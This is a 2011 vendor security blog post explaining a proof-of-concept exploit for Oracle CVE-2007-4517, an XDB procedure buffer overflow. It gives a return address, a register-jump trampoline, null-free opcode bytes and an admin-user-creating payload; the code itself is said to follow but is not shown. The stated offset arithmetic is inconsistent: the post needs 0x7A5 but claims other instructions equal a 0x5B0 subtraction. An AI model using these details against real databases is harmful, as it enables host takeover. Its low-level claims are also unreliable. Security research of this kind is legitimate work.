New exploit to Oracle CVE-2007-4517 vulnerability

November 2, 2011

Summary

As part of GreenSQL’s Database security research, we’ve been validating and extending coverage of known and unknown vulnerabilities in order to increase GreenSQL product security, at this post we will reveal a full working Prove of Concept for the CVE-2007-4517 vulnerability which executes arbitrary code.

The Exploit: PL/SQL/2007-4517 exploit is a PL/SQL procedure that exploits the CVE-2007-4517 vulnerability, also known as Oracle Database XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Procedure Multiple Argument Remote Overflow.

The vulnerability is caused due to a boundary error in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure when processing the OWNER and NAME arguments to create an SQL query.

This can be exploited to cause a buffer overflow by passing overly long OWNER and NAME arguments to the affected procedure.

When executing the code, the EBX contains the starting address of the buffer + 0x7A5.

In order to execute the payload in the buffer, the following steps needs to be performed:
1. The EIP should point to an address contains the jmp EBX instruction.
2. At the [EBX] address, the exploit needs to jmp -0x7A5 to the start of the buffer.

Jumping to EBX
In order to jump to the address in the EBX register, the EIP should be set to 0x 095F7160.

Jumping to the Payload
In order to execute the payload, the following instructions needs to be performed:
sub ebx, 0x7a5
jmp ebx

The opcodes of the first instruction are:
0x81, 0xEB, 0xA5, 0x07, 0x00, 0x00.
One of the limitations of HEXTORAW() function, is that it’s not able to deal with 0x00 characters.
Because of that reason, instead of using the sub ebx, 0x7a5 instruction, the following instructions need to be performed:
sub bl,0xb0
add bh,0xfa
jmp ebx

Which are equivalent to:
sub ebx, 0x5b0
jmp ebx

Which is equivalent to jmp ebx-0x5b0.

The opcodes of those instructions are:
0x80, 0xEB, 0xB0, 0x80, 0xC7, 0xFA, 0xFF, 0xE3, which are able to be processed by the HEXTORAW() function.

The payload creates a new user account, called “GreenSQL”, with the password “GreenSQL”.
After creating the user account, it adds the user to the “Administrators” group.

The exploit code is available below.

Conclusions

It’s extremely important to make sure that you have updated your Database with the latest patches and security updates the database vendor has released, this prove of concept shows how it’s possible to gain control over your database host operating system using older vulnerability, which with extended research can be transformed to a new exploit.

Database security solutions, like GreenSQL, provides additional layer of defense against known and unknown attacks.